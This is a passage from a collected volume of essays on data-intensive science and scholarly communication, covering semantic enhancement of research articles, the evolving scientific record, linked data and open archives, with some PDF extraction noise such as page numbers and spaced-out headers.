and myExperiment17 projects demonstrate the benefits of capturing and then sharing, in a semantically rich way, the definitions of workflows in science. Such workflows effectively document the process by which research-related information is produced and the steps taken toward reaching (or unsuccessfully trying to reach) a conclusion. Imagine the possibilities of expanding this idea to all aspects of our interaction with information. Today, for example, when someone enters GDP of Brazil vs. Japan as a query in Wolfram|Alpha, the engine knows how to interpret the input and produce a comparison graph of the GDP (gross domestic product) of the two countries. If the query is Ford, the engine makes an assumption about its interpretation but also provides alternatives (e.g., person if the intended meaning might be Henry Ford or Gerald Rudolph Ford, Jr., vs. business entity if the intended meaning might be the Ford Motor Company). The context within which specific information is to be interpreted is important in determining what computational work will be performed. The same ideas could be implemented as part of a global research infrastructure, where Wolfram|Alpha could be one of the many available interoperable services that work together to support researchers. The research community would indeed benefit greatly from a global infrastructure whose focus is on knowledge sharing and in which all applications and services are built with knowledge exchange and processing at their core. This is not to suggest that there should be yet another attempt to unify and centrally manage all knowledge representation. Scientists will always be better at representing and reasoning over their own domain. However, a research infrastructure should accommodate all domains and provide the necessary glue for information to be crosslinked, correlated, and discovered in a semantically rich manner. Such an infrastructure must provide the right set of services to not only allow access to semantically rich information but also expose computational services that operate on the worlds knowledge. Researchers would be able to ask questions related to their domain of expertise, and a sea of knowledge would immediately be accessible to them. The processes of acquiring and sharing knowledge would be automated, and associated tools (e.g., a word processor that records an authors intended 16 17 168 SCIENTIFIC INFRASTRUCTURE Knowledge Bases Environmental Science Desktop/Cloud Tools, Services, Applications Knowledge Representation Figure 1. High-level view of a research infrastructure that brings together knowledge bases and computational services. use of a term18) would make it even easier to analyze, do research, and publish results. Natural language processing will aid in the interaction with the knowledgebased ecosystem of information, tools, and services, as shown in Figure 1. Note that this proposed research infrastructure would not attempt to realize artificial intelligence (AI)despite the fact that many of the technologies from the Semantic Computing19 community (from data modeling and knowledge representation to natural language processing and reasoning) have emerged from work in 18 19 A distinction is assumed between the general approach of computing based on semantic technologies (machine learning, neural networks, ontologies, inference, etc.) and the Semantic Web as described in [5] and [6], which refers to a specific ecosystem of technologies, such as RDF and OWL. The Semantic Web technologies are considered to be just some of the many tools at our disposal when building semantics-based and knowledge-based solutions. 169 the AI field over the decades. The primary focus of the proposed cyberinfrastructure is automated knowledge management rather than intelligence. Mashing Up Knowledge Interdisciplinary research has gained a lot of momentum, especially as the result of eScience and cyberinfrastructure activities. Technology has played an enabling role by primarily supporting collaboration, sharing of information, and data management within the context of a research project. In the future, researchers should not have to think about how their questions, assumptions, theories, experiments, or data correlate with existing knowledge across disciplines in one scientific domain or even across domains. The process of combining information from existing scientific knowledge generated by different researchers at different times and in different locations, including the specific methodologies that were followed to produce conclusions, should be automatic and implicitly supported by the research infrastructure.20 For example, it should be trivial for a young Ph.D. researcher in chemistry to pose work items to a computer as natural language statements like Locate 100,000 molecules that are similar to the known HIV protease inhibitors, then compute their electronic properties and dock them into viral escape mutants. This illustrates the use of natural language processing and also the need for researchers to agree on vocabularies for capturing knowledgesomething already occurring in many scientific domains through the use of Semantic Web technologies. Furthermore, the example illustrates the need to be able to capture the computational aspects of how existing knowledge is processed and how new facts are generated. The research community has already started working on bringing the existing building blocks together to realize a future in which machines can further assist researchers in managing and processing knowledge. As an example, the oreChem21 project aims to automate the process by which chemistry-related knowledge captured in publications is extracted and represented in machine-processable formats, such as the Chemistry Markup Language (CML). Through the use of chemistryrelated ontologies, researchers will be able to declaratively describe the computations they would like to perform over the body of machine-processable knowledge. 20 21 Assuming that open access to research information has become a reality. 170 SCIENTIFIC INFRASTRUCTURE While projects such as oreChem do not attempt to realize a large-scale infrastructure for computable scientific knowledge, they do represent the first investigations toward such a vision. Going forward, the boundaries of domains will become less rigid so that cross-discipline knowledge (computational) mashups can become an important aspect of any semantics-enabled, knowledge-driven research infrastructure. The ability to cross-reference and cross-correlate information, facts, assumptions, and methodologies from different research domains on a global scale will be a great enabler for our future researchers. A Call to Action Today, platforms that offer implementations of the MapReduce computational pattern (e.g., Hadoop and Dryad) make it easy for developers to perform data-intensive computations at scale. In the future, it will be very important to develop equivalent platforms and patterns to support knowledge-related actions such as aggregation, acquisition, inference, reasoning, and information interpretation. We should aim to provide scientists with a cyberinfrastructure on top of which it should be easy to build a large-scale application capable of exploiting the worlds computerrepresented scientific knowledge. The interoperable exchange of information, whether representing facts or processes, is vital to successfully sharing knowledge. Communities need to come togetherand many of them are already doing soin order to agree on vocabularies for capturing facts and information specific to their domains of expertise. Research infrastructures of the future will create the necessary links across such vocabularies so that information can be interlinked as part of a global network of facts and processes, as per Tim Berners-Lees vision for the Semantic Web. The future research infrastructures, which will be knowledge driven, will look more like Vannevar Bushs memex than todays data-driven computing machines. As Bush said, Wholly new forms of encyclopedias will appear, ready made with a mesh of associative trails running through them, ready to be dropped into the memex and there amplified. [7] We are not far from that vision today. Acknowledgments The author would like to thank Peter Murray Rust (University of Cambridge) for his explanation of the oreChem project, Evelyne Viegas (Microsoft Research) for insightful discussions and great ideas over the years on all things related to Semantic Computing, and Tony Hey for his continuous support, encouragement, and trust. 171 References [1] L. Dirks and T. Hey, The Coming Revolution in Scholarly Communications & Cyberinfrastructure, CT Watch Q., vol. 3, no. 3, 2007. [2] National Science Foundation, Cyberinfrastructure Vision for 21st Century Discovery, March 2007. [3] J. Taylor (n.d.), UK eScience Programme, retrieved from. [4] J. Gray and A. Szalay, eScience - A Transformed Scientific Method, Presentation to the Computer Science and Technology Board of the National Research Council, Jan. 11, 2007, retrieved from. (Edited transcript in this volume.) [5] T. Berners-Lee, J. A. Hendler, and O. Lasilla, The Semantic Web, Scientific American, vol. 284, no. 5, pp. 3543, May 2001,. [6] N. Shadbolt, W. Hall, and T. Berners-Lee, The Semantic Web Revisited, IEEE Intell. Syst., vol. 21, no. 3, pp. 96101, 2006, doi: 10.1109/MIS.2006.62. [7] V. Bush, As We May Think, The Atlantic, July 1945, doi: 10.3998/3336451.0001.101. 172 SCIENTIFIC INFRASTRUCTURE 4 . s c h o l a r ly c o m m u n i c at i o n s c h o l a r ly co m m u n i c at i o n Introduction 175 roadmap that outlines an ideal route to a vision he shared with Jim Gray of community-driven scientific knowledge curation and creation. Van de Sompel and Lagoze stress that academics have yet to realize the full potential benefits of technology for scholarly communication. The authors make a crucial point that the hardest issues are social or dependent on humans, which means they cannot be easily resolved by new applications and additional silicon. They call for the development of open standards and interoperability protocols to help mitigate this situation. The issues of sharing scientific data at an international level are addressed by Fitzgerald, Fitzgerald, and Pappalardo. Scientists sometimes encounter the greatest constraints at the national or regional level, which prevent them from participating in the global scientific endeavor. Citing a specific example, the authors appeal for coordination beyond the scientific community and recommend that policymakers work to avoid introducing impediments into the system. Wilbanks puts a fine point on a common theme throughout this section: in many ways, scientists are often unwittingly responsible for holding back science. Even though, as professionals, we envision, instrument, and execute on innovative scientific endeavors, we do not always actually adopt or fully realize the systems we have put in place. As an amalgamated population of forward-thinking researchers, we often live behind the computational curve. He notes that it is crucial for connectivity to span all scientific fields and for multidisciplinary work and cooperation across domains, in turn, to fuel revolutionary advancements. Hannay closes the section by highlighting the interconnectedness of our networked world despite lingering social barriers between various scientific fields. He notes that sciences gradual shift from a cottage enterprise to a large-scale industry is part of the evolution of how we conduct science. He provides intriguing examples from around the world of research that can point a way to the future of Web-based communication, and he declares that we are living in an awkward age immediately prior to the advent of semantic reality and interconnectedness. Research is evolving from small, autonomous scholarly guilds to larger, more enlightened, and more interconnected communities of scientists who are increasingly interdependent upon one another to move forward. In undertaking this great endeavor togetheras Jim envisionedwe will see science, via computation, advance further and faster than ever before. 176 s c h o l a r ly co m m u n i c at i o n Jim Grays Fourth Paradigm and the Construction of the Scientific Record Jim Gray led the thinking of a group of scholars who saw the emergence of what they characterized as a fourth paradigm of scientific research. In this essay, I will focus narrowly on the implications of this fourth paradigm, which I will refer to as data-intensive science [1], for the nature of scientific communication and the scientific record. Grays paradigm joins the classic pair of opposed but mutually supporting scientific paradigms: theory and experimentation. The third paradigmthat of large-scale computational simulation emerged through the work of John von Neumann and others in the mid-20th century. In a certain sense, Grays fourth paradigm provides an integrating framework that allows the first three to interact and reinforce each other, much like the traditional scientific cycle in which theory offered predictions that could be experimentally tested, and these experiments identified phenomena that required theoretical explanation. The contributions of simulation to scientific progress, while enormous, fell short of their initial promise (for example, in long-term weather prediction) in part because of the extreme sensitivity of complex systems to initial conditions and chaotic behaviors [2]; this is one example in which simulation, theory, and experiment in the context of massive amounts of data must all work together. To understand the effects of data-intensive science on the 177 scientific record,1 it is first necessary to review the nature of that record, what it is intended to accomplish, and where it has and hasnt succeeded in meeting the needs of the various paradigms and the evolution of science. To a first approximation, we can think of the modern scientific record, dating from the 17th century and closely tied to the rise of both science and scholarly societies, as comprising an aggregation of independent scientific journals and conference presentations and proceedings, plus the underlying data and other evidence to support the published findings. This record is stored in a highly distributed and, in some parts, highly redundant fashion across a range of libraries, archives, and museums around the globe. The data and evidentiary components have expanded over time: written observational records too voluminous to appear in journals have been stored in scientific archives, and physical evidence held in natural history museums is now joined by a vast array of digital datasets, databases, and data archives of various types, as well as pre-digital observational records (such as photographs) and new collections of biological materials. While scientific monographs and some specialized materials such as patents have long been a limited but important part of the record, gray literature, notably technical reports and preprints, have assumed greater importance in the 20th century. In recent years, we have seen an explosion of Web sites, blogs, video clips, and other materials (generally quite apart from the traditional publishing process) become a significant part of this record, although the boundaries of these materials and various problems related to their persistent identification, archiving and continued accessibility, vetting, and similar properties have been highly controversial. The scientific record is intended to do a number of things. First and foremost, it is intended to communicate findings, hypotheses, and insights from one person to another, across space and across time. It is intended to organize: to establish common nomenclature and terminology, to connect related work, and to develop disciplines. It is a vehicle for building up communities and for a form of large-scale collaboration across space and time. It is a means of documenting, managing, and often, ultimately, resolving controversies and disagreements. It can be used to establish precedence for ideas and results, and also (through citation and bibliometrics) to offer evidence for the quality and significance of scientific work. The scientific record is intended to be trustworthy, in several senses. In the small and in the near 1 For brevity and clearest focus, Ive limited the discussion here to science. But just as its clear that eScience is only a special case of eResearch and data-intensive science is a form of data-intensive scholarship, many of the points here should apply, with some adaptation, to the humanities and the social sciences. 178 term, pre-publication peer review, editorial and authorial reputation, and transparency in reporting results are intended to ensure confidence in the correctness of individual articles. In the broader sense, across spans of time and aggregated collections of materials, findings are validated and errors or deliberate falsifications, particularly important ones, are usually identified and corrected by the community through post-publication discussion or formal review, reproduction, reuse and extension of results, and the placement of an individual publications results in the broader context of scientific knowledge. A very central idea that is related simultaneously to trustworthiness and to the ideas of collaboration and building upon the work of others is that of reproducibility of scientific results. While this is an ideal that has often been given only reluctant practical support by some scientists who are intent on protecting what they view as proprietary methods, data, or research leads, it is nonetheless what fundamentally distinguishes science from practices such as alchemy. The scientific recordnot necessarily a single, self-contained article but a collection of literature and data within the aggregate record, or an article and all of its implicit and explicit links in todays terminologyshould make enough data available, and contain enough information about methods and practices, that another scientist could reproduce the same results starting from the same data. Indeed, he or she should be able to do additional work that helps to place the initial results in better context, to perturb assumptions and analytic methods, and to see where these changes lead. It is worth noting that the ideal of reproducibility for sophisticated experimental science often becomes problematic over long periods of time: reproducing experimental work may require a considerable amount of tacit knowledge that was part of common scientific practice and the technology base at the time the experiment was first carried out but that may be challenging and time consuming to reproduce many decades later. How well did the scientific record work during the long dominance of the first two scientific paradigms? In general, pretty well, I believe. The record (and the institutions that created, supported, and curated it) had to evolve in response to two major challenges. The first was mainly in regard to experimental science: as experiments became more complicated, sophisticated, and technologically mediated, and as data became more extensive and less comprehensively reproduced as part of scientific publications, the linkages between evidence and writings became more complex and elusive. In particular, as extended computation (especially mechanically or electromechanically assisted computation carried out by groups of 179 human computers) was applied to data, difficulties in reproducibility began to extend far beyond access to data and understanding of methods. The affordances of a scholarly record based on print and physical artifacts offered little relief here; the best that could be done was to develop organized systems of data archives and set some expectations about data deposit or obligations to make data available. The second evolutionary challenge was the sheer scale of the scientific enterprise. The literature became huge; disciplines and sub-specialties branched and branched again. Tools and practices had to be developed to help manage this scalespecialized journals, citations, indices, review journals and bibliographies, managed vocabularies, and taxonomies in various areas of science. Yet again, given the affordances of the print-based system, all of these innovations seemed to be too little too late, and scale remained a persistent and continually overwhelming problem for scientists. The introduction of the third paradigm in the middle of the 20th century, along with the simultaneous growth in computational technologies supporting experimental and theoretical sciences, intensified the pressure on the traditional scientific record. Not only did the underlying data continue to grow, but the output of simulations and experiments became large and complex datasets that could only be summarized, rather than fully documented, in traditional publications. Worst of all, software-based computation for simulation and other purposes became an integral part of the question of experimental reproducibility.2 Its important to recognize how long it really took to reach the point when computer hardware was reasonably trustworthy in carrying out large-scale floating-point computations.3 (Even today, we are very limited in our ability to produce provably correct large-scale software; we rely on the slow growth of confidence through long and widespread use, preferably in a range of different hardware and platform environments. Documenting complex software configurations as part of the provenance of the products of data-intensive science remains a key research challenge in data curation and scientific workflow structuring.) The better news was that computational technologies began to help with the management of the enormous and growing body of sci2 Actually, the ability to comprehend and reproduce extensive computations became a real issue for theoretical science as well; the 1976 proof of the four-color theorem in graph theory involved exhaustive computer analysis of a very large number of special cases and caused considerable controversy within the mathematical community about whether such a proof was really fully valid. A more recent example would be the proposed proof of the Kepler Conjecture by Thomas Hales. 3 The IEEE floating-point standard dates back to only 1985. I can personally recall incidents with major mainframe computers back in the 1970s and 1980s in which shipped products had to be revised in the field after significant errors were uncovered in their hardware and/or microcode that could produce incorrect computational results. 180 entific literature as many of the organizational tools migrated to online databases and information retrieval systems starting in the 1970s and became ubiquitous and broadly affordable by the mid-1990s. With the arrival of the data-intensive computing paradigm, the scientific record and the supporting system of communication and publication have reached a Janus moment where we are looking both backward and forward. It has become clear that data and software must be integral parts of the recorda set of first-class objects that require systematic management and curation in their own right. We see this reflected in the emphasis on data curation and reuse in the various cyberinfrastructure and eScience programs [3-6]. These datasets and other materials will be interwoven in a complex variety of ways [7] with scientific papers, now finally authored in digital form and beginning to make serious structural use of the new affordances of the digital environment, and at long last bidding a slow farewell to the initial model of electronic scientific journals, which applied digital storage and delivery technologies to articles that were essentially images of printed pages. We will also see tools such as video recordings used to supplement traditional descriptions of experimental methods, and the inclusion of various kinds of two- or threedimensional visualizations. At some level, one can imagine this as the perfecting of the traditional scientific paper genre, with the capabilities of modern information technology meeting the needs of the four paradigms. The paper becomes a window for a scientist to not only actively understand a scientific result, but also reproduce it or extend it. However, two other developments are taking hold with unprecedented scale and scope. The first is the development of reference data collections, often independent of specific scientific research even though a great deal of research depends on these collections and many papers make reference to data in these collections. Many of these are created by robotic instrumentation (synoptic sky surveys, large-scale sequencing of microbial populations, combinatorial chemistry); some also introduce human editorial and curatorial work to represent the best current state of knowledge about complex systems (the annotated genome of a given species, a collection of signaling pathways, etc.) and may cite results in the traditional scientific literature to justify or support assertions in the database. These reference collections are an integral part of the scientific record, of course, although we are still struggling with how best to manage issues such as versioning and the fixity of these resources. These data collections are used in very different ways than traditional papers; most often, they are computed upon rather than simply read. 181 As these reference collections are updated, the updates may trigger new computations, the results of which may lead to new or reassessed scientific results. More and more, at least some kinds of contributions to these reference data collections will be recognized as significant scholarly contributions in their own right. One might think of this as scientists learning to more comprehensively understand the range of opportunities and idioms for contributing to the scholarly record in an era of data and computationally intensive science. Finally, the scientific record itself is becoming a major object of ongoing computationa central reference data collectionat least to the extent to which copyright and technical barriers can be overcome to permit this [8]. Data and text mining, inferencing, integration among structured data collections and papers written in human languages (perhaps augmented with semantic markup to help computationally identify references to particular kinds of objectssuch as genes, stars, species, chemical compounds, or places, along with their associated propertieswith a higher degree of accuracy than would be possible with heuristic textual analysis algorithms), information retrieval, filtering, and clustering all help to address the problems of the ever-growing scale of the scientific record and the ever-increasing scarcity of human attention. They also help exploit the new technologies of dataintensive science to more effectively extract results and hypotheses from the record. We will see very interesting developments, I believe, as researchers use these tools to view the public record of science through the lens of various collections of proprietary knowledge (unreleased results, information held by industry for commercial advantage, or even government intelligence). In the era of data-intensive computing, we are seeing people engage the scientific record in two ways. In the small, one or a few articles at a time, human beings read papers as they have for centuries, but with computational tools that allow them to move beyond the paper to engage the underlying science and data much more effectively and to move from paper to paper, or between paper and reference data collection, with great ease, precision, and flexibility. Further, these encounters will integrate with collaborative environments and with tools for annotation, authoring, simulation, and analysis. But now we are also seeing scholars engage the scientific record in the large, as a corpus of text and a collection of interlinked data resources, through the use of a wide range of new computational tools. This engagement will identify papers of interest; suggest hypotheses that might be tested through combinations of theoretical, experimental, and simulation investigations; or at times directly produce new data or results. As the balance of engagement 182 in the large and in the small shifts (today, it is still predominantly in the small, I believe), we will see this change many aspects of scientific culture and scientific publishing practice, probably including views on open access to the scientific literature, the application of various kinds of markup and the choice of authoring tools for scientific papers, and disciplinary norms about data curation, data sharing, and overall data lifecycle. Further, I believe that in the practice of data-intensive science, one set of data will, over time, figure more prominently, persistently, and ubiquitously in scientific work: the scientific record itself. Acknowledgments My thanks to the participants at the April 24, 2009, Buckland-Lynch-Larsen Friday Seminar on information access at the University of California, Berkeley, School of Information for a very helpful discussion on a draft of this material. References [1] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, pp. 12971298, Mar. 6, 2009, doi: 10.1126/science.1170411. [2] Freeman Dysons 2008 Einstein lecture, Birds and Frogs, Notices Am. Math. Soc., vol. 56, no. 2, pp. 212224, Feb. 2009,. [3] National Science Board, Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century, National Science Foundation, 2005, start.jsp. [4] Association of Research Libraries, To Stand the Test of Time: Long-term Stewardship of Digital Data Sets in Science and Engineering, Association of Research Libraries, 2006. access/nsfworkshop.shtml. [5] Various reports available from the National Science Foundation Office of Cyberinfrastructure,, including the Cyberinfrastructure Vision document and the Atkins report. [6] L. Lyon, Dealing with Data: Roles, Rights, Responsibilities and Relationships, (consultancy report), UKOLN and the Joint Information Systems Committee (JISC), 2006, whatwedo/programmes/programme_digital_repositories/project_dealing_with_data.aspx. [7] C. A. Lynch, The Shape of the Scientific Article in the Developing Cyberinfrastructure, CT Watch, vol. 3, no. 3, pp. 511, Aug. 2007, the-shape-of-the-scientific-article-in-the-developing-cyberinfrastructure. [8] C. A. Lynch, Open Computation: Beyond Human-Reader-Centric Views of Scholarly Literatures, in Neil Jacobs, Ed., Open Access: Key Strategic, Technical and Economic Aspects. Oxford: Chandos Publishing, 2006, pp. 185193,. 183 s c h o l a r ly co m m u n i c at i o n first met jim gray when he was the moderator of the database subject area of arXiv, part of the expansion into computer science that arXiv initiated in 1998. Soon afterward, he was instrumental in facilitating the full-text harvest of arXiv by large-scale search engines, beginning with Google and followed by Microsoft and Yahoo!previous robotic crawls of arXiv being overly restricted in the 1990s due to their flooding of the servers with requests. Jim understood the increasing role of text as a form of data, and the need for text to be ingestible and treatable like any other computable object. In 2005, he was involved in both arXiv and PubMed Central and expressed to me his mystification that while the two repositories served similar roles, they seemed to operate in parallel universes, not connecting in any substantive way. His vision was of a world of scholarly resourcestext, databases, and any other associated materialsthat were seamlessly navigable and interoperable. Many of the key open questions regarding the technological transformation of scholarly infrastructure were raised well over a decade ago, including the long-term financial model for implementing quality control, the architecture of the article of the future, and how all of the pieces will merge into an interoperable whole. While answers have remained elusive, there is reason to expect significant near-term progress on at least the latter two 185 questions. In [1], I described how the range of possibilities for large and comprehensive full-text aggregations were just starting to be probed and offered the PubMed Central database as an exemplar of a forward-looking approach. Its full-text XML documents are parsed to permit multiple related material views for a given article, with links to genomic, nucleotide, inheritance, gene expression, protein, chemical, taxonomic, and other related databases. This methodology is now beginning to spread, along with more general forms of semantic enhancement: facilitating automated discovery and reasoning, providing links to related documents and data, providing access to actionable data within articles, and permitting integration of data between articles. A recent example of semantic enhancement by a publisher is the Royal Society of Chemistrys journal Molecular BioSystems.1 Its enhanced HTML highlights terms in the text that are listed in chemical terminology databases and links them to the external database entries. Similarly, it highlights and links terms from gene, sequence, and cell ontologies. This textual markup is implemented by editors with subject-matter expertise, assisted by automated text-mining tools. An example of a fully automated tool for annotation of scientific terms is EMBL Germanys Reflect,2 which operates as an external service on any Web page or as a browser plug-in. It tags gene, protein, and small molecule names, and the tagged items are linked to the relevant sequence, structure, or interaction databases. In a further thought experiment, Shotton et al. [2] marked up an article by hand using off-the-shelf technologies to demonstrate a variety of possible semantic enhancementsessentially a minimal set that would likely become commonplace in the near future. In addition to semantic markup of textual terms and live linkages of DOIs and other URLs where feasible, they implemented a reorderable reference list, a document summary including document statistics, a tag cloud of technical terms, tag trees of marked-up named entities grouped by semantic type, citation analysis (within each article), a Citations in Context tooltip indicating the type of citation (background, intellectual precedent, refutation, and so on), downloadable spreadsheets for tables and figures, interactive figures, and data fusion with results from other research articles and with contextual online maps. (See Figure 1.) They emphasize the future importance of domain-specific structured digital abstracts namely, machine-readable metadata that summarize key data and conclusions of articles, including a list of named entities in the article with precise database iden1 2 186 FIGURE 1. A screenshot of Exemplar Semantic Enhancements from 2008/plospaper/latest, as described in [2]. Different semantic classes of terms are linked and can be optionally highlighted using the buttons in the top row. Hovering the mouse pointer over an in-text reference citation displays a box containing key supporting statements or figures from the cited document. tifiers, a list of the main results described via controlled vocabulary, and a description, using standard evidence codes, of the methodology employed. The use of controlled vocabularies in this structured summary will enable not only new metrics for article relatedness but also new forms of automated reasoning. Currently, recognition of named entities (e.g., gene names) in unstructured text is relatively straightforward, but reliable extraction of relationships expressed in conventional text is significantly more difficult. The next generation of automated knowledge extraction and processing tools, operating on structured abstracts and semantically enhanced text, will bring us that much closer to direct searching and browsing of knowledgei.e., via synthesized concepts and their relationships. Further enhancements will include citation network analysis, automated image analysis, more generalized data mashups, and prekeyed or configurable algorithms that provide new types of semantic lenses through which to view the text, data, and images. All of these features can also be federated into hub environments where 187 users can annotate articles and related information, discover hidden associations, and share new results. In the near term, semantic text enhancement will be performed by a combination of semi-supervised tools used by authors,3 tools used by editors, and automated tools applied to both new and archival publications. Many legacy authors will be unwilling to spend time enhancing their documents, especially if much additional effort is required. Certainly many publishers will provide the markup as a valueadded component of the publication processi.e., as part of their financial model. The beneficial effects of this enhancement, visible to all readers, will create pressure in the open sector for equally powerful tools, perhaps after only a small time lag as each new feature is developed. It is more natural to incorporate the semantics from the outset rather than trying to layer it on afterwardsand in either case, PDF will not provide a convenient transport format. With the correct document format, tools, and incentives, authors may ultimately provide much of the structural and semantic metadata during the course of article writing, with marginal additional effort. In the longer term, there remains the question of where the semantic markup should be hosted, just as with other data published to the Web: Should publishers host datasets relevant to their own publications, or should there be independent SourceForge-like data repositories? And how should the markup be stored: as triplestores internal to the document or as external attachments specifying relationships and dependencies? As knowledge progresses, there will be new linkages, new things to annotate, and existing annotations that may lead to changed resources or data. Should it be possible to peel these back and view the document in the context of any previous time frame? To avoid excessive one-off customization, the interactions between documents and data and the fusion of different data sources will require a generic, interoperable semantic layer over the databases. Such structures will also make the data more accessible to generic search engines, via keyword searches and natural-language queries. Having the data accessible in this way should encourage more database maintainers to provide local semantic interfaces, thereby increasing integration into the global data network and amplifying the community benefits of open access to text and data. Tim Berners-Lee4 has actively promoted the notion of linked data 3 For example, Pablo Fernicolas Article Authoring Add-in for Microsoft Office Word 2007,. 4 188 for all such purposes, not just by academics or for large and commonly used databases. Every user makes a small contribution to the overall structure by linking an object to a URI, which can be dereferenced to find links to more useful data. Such an articulated semantic structure facilitates simpler algorithms acting on World Wide Web text and data and is more feasible in the near term than building a layer of complex artificial intelligence to interpret free-form human ideas using some probabilistic approach. New forms of interaction with the data layer are also embedded in discussions of Wolfram|Alpha,5 a new resource (made publicly available only after this writing) that uses substantial personnel resources to curate many thousands of data feeds into a format suitable for manipulation by a Mathematica algorithmic and visualization engine. Supplemented by a front end that interprets semi-natural-language queries, this system and its likely competition will dramatically raise user expectations for new forms of synthesized information that is available directly via generic search engines. These applications will develop that much more quickly over data repositories whose semantic layer is curated locally rather than requiring centralized curation. Much of the recent progress in integrating data with text via semantic enhancement, as described above, has been with application to the life sciences literature. In principle, text mining and natural-language processing tools that recognize relevant entities and automatically link to domain-specific ontologies have natural analogs in all fieldsfor example, astronomical objects and experiments in astronomy; mathematical terms and theorems in mathematics; physical objects, terminology, and experiments in physics; and chemical structures and experiments in chemistry. While data-intensive science is certainly the norm in astrophysics, the pieces of the data network for astrophysics do not currently mesh nearly as well as in the life sciences. Most paradoxically, although the physics community was ahead in many of these digital developments going back to the early 1990s (including the development of the World Wide Web itself at CERN, a high-energy physics lab) and in providing open access to its literature, there is currently no coordinated effort to develop semantic structures for most areas of physics. One obstacle is that in many distributed fields of physics, such as condensed-matter physics, there are no dominant laboratories with prominent associated libraries to establish and maintain global resources. 5, based on a private demonstration on April 23, 2009, and a public presentation on April 28, 2009,. 189 In the biological and life sciences, its also possible that text will decrease in value over the next decade compared with the semantic services that direct researchers to actionable data, help interpret information, and extract knowledge [3]. In most scientific fields, however, the result of research is more than an impartial set of database entries. The scientific article will retain its essential role of using carefully selected data to persuade readers of the truth of its authors hypotheses. Database entries will serve a parallel role of providing access to complete and impartial datasets, both for further exploration and for automated data mining. There are also important differences among areas of science in the role played by data. As one prominent physicist-turned-biologist commented to me recently, There are no fundamental organizing principles in biology6suggesting that some fields may always be intrinsically more data driven than theory driven. Science plays different roles within our popular and political culture and hence benefits from differing levels of support. In genomics, for example, we saw the early development of GenBank, its adoption as a government-run resource, and the consequent growth of related databases within the National Library of Medicine, all heavily used. It has also been suggested that massive data mining, and its attendant ability to tease out and predict trends, could ultimately replace more traditional components of the scientific method [4]. This viewpoint, however, confuses the goals of fundamental theory and phenomenological modeling. Science aims to produce far more than a simple mechanical prediction of correlations; instead, its goal is to employ those regularities extracted from data to construct a unified means of understanding them a priori. Predictivity of a theory is thus primarily crucial as a validator of its conceptual content, although it can, of course, have great practical utility as well. So we should neither overestimate the role of data nor underestimate that of text, and all scientists should track the semantic enhancement of text and related data-driven developments in the biological and life sciences with great interest and perhaps with envy. Before too long, some archetypal problem might emerge in the physical sciences7 that formerly required many weeks of complex query traversals of databases, manually maintained browser tabs, impromptu data analysis scripts, and all the rest of the things we do on a daily basis. For example, a future researcher with seamless semantic access to a federation of databasesincluding band structure properties and calculations, nuclear magnetic resonance (NMR) 6 Wally Gilbert, dinner on April 27, 2009. His comment may have been intended in a more limited context than implied here. As emphasized to me by John Wilbanks in a discussion on May 1, 2009. 190 and X-ray scattering measurements, and mechanical and other propertiesmight instantly find a small modification to a recently fabricated material to make it the most efficient photovoltaic ever conceived. Possibilities for such progress in finding new sources of energy or forestalling long-term climate change may already be going unnoticed in todays unintegrated text/database world. If classes of such problems emerge and an immediate solution can be found via automated tools acting directly on a semantic layer that provides the communication channels between open text and databases, then other research communities will be bootstrapped into the future, benefiting from the new possibilities for community-driven scientic knowledge curation and creation embodied in the Fourth Paradigm. References [1] P. Ginsparg, Next-Generation Implications of Open Access, articles/2007/08/next-generation-implications-of-open-access, accessed Aug. 2007. [2] D. Shotton, K. Portwin, G. Klyne, and A. Miles, Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article, PLoS Comput. Biol., vol. 5, no. 4, p. e1000361, 2009, doi: 10.1371/journal.pcbi.1000361. [3] P. Bourne, Will a Biological Database Be Different from a Biological Journal? PLoS Comput. Biol., vol. 1, no. 3, p. e34, 2005, doi: 10.1371/journal.pcbi.0010034. This article was intentionally provocative. [4] C. Anderson, The End of Theory: The Data Deluge Makes the Scientific Method Obsolete, Wired, June 2008,. This article was also intentionally provocative. 191 s c h o l a r ly co m m u n i c at i o n He r be rt Van de Som pe l Los Alamos National Laboratory Car l L agoze Cornell University ference presentations and eventually fully articulated in a 2004 paper [1], is still by and large true. Although scholarly publishers have adopted new technologies that have made access to scholarly materials significantly easier (such as the Web and PDF documents), these changes have not realized the full potential of the new digital and networked reality. In particular, they do not address three shortcomings of the prevailing scholarly communication system: Systemic issues, particularly the unbreakable tie in the publication system between the act of making a scholarly claim and the peer-review process Economic strains that are manifested in the serials crisis, which places tremendous burdens on libraries Technical aspects that present barriers to an interoperable information infrastructure We share these concerns about the state of scholarly communication with many others worldwide. Almost a decade ago, we 193 collaborated with members of that global community to begin the Open Archives Initiative (OAI), which had a significant impact on the direction and pace of the Open Access movement. The OAI Protocol for Metadata Harvesting (OAI-PMH) and the concurrent OpenURL effort reflected our initial focus on the process-related aspects of scholarly communication. Other members of the community focused on the scholarly content itself. For example, Peter Murray-Rust addressed the flattening of structured, machine-actionable information (such as tabular data and data points underlying graphs) into plain text suited only for human consumption [2]. A decade after our initial work in this area, we are delighted to observe the rapid changes that are occurring in various dimensions of scholarly communication. We will touch upon three areas of change that we feel are significant enough to indicate a fundamental shift. Augmenting the Scholarly Record with a Machine-actionable Substrate One motivation for machine readability is the flood of literature that makes it impossible for researchers to keep up with relevant scholarship [3]. Agents that read and filter on scholars behalf can offer a solution to this problem. The need for such a mechanism is heightened by the fact that researchers increasingly need to absorb and process literature across disciplines, connecting the dots and combining existing disparate findings to arrive at new insights. This is a major issue in life sciences fields that are characterized by many interconnected disciplines (such as genetics, molecular biology, biochemistry, pharmaceutical chemistry, and organic chemistry). For example, the lack of uniformly structured data across related biomedical domains is cited as a significant barrier to translational researchthe transfer of discoveries in basic biological and medical research to application in patient care at the clinical level [4]. Recently, we have witnessed a significant push toward a machine-actionable representation of the knowledge embedded in the life sciences literature, which supports reasoning across disciplinary boundaries. Advanced text analysis techniques are being used to extract entities and entity relations from the existing literature, and shared ontologies have been introduced to achieve uniform knowledge representation. This approach has already led to new discoveries based on information embedded in literature that was previously readable only by humans. Other disciplines have engaged in similar activities, and some initiatives are allowing scholars to start publishing entity and entity-relation information at the time of an articles publication, to avoid the post-processing that is current practice [5]. 194 The launch of the international Concept Web Alliance, whose aim is to provide a global interdisciplinary platform to discuss, design, and potentially certify solutions for the interoperability and usability of massive, dispersed, and complex data, indicates that the trend toward a machine-actionable substrate is being taken seriously by both academia and the scholarly information industry. The establishment of 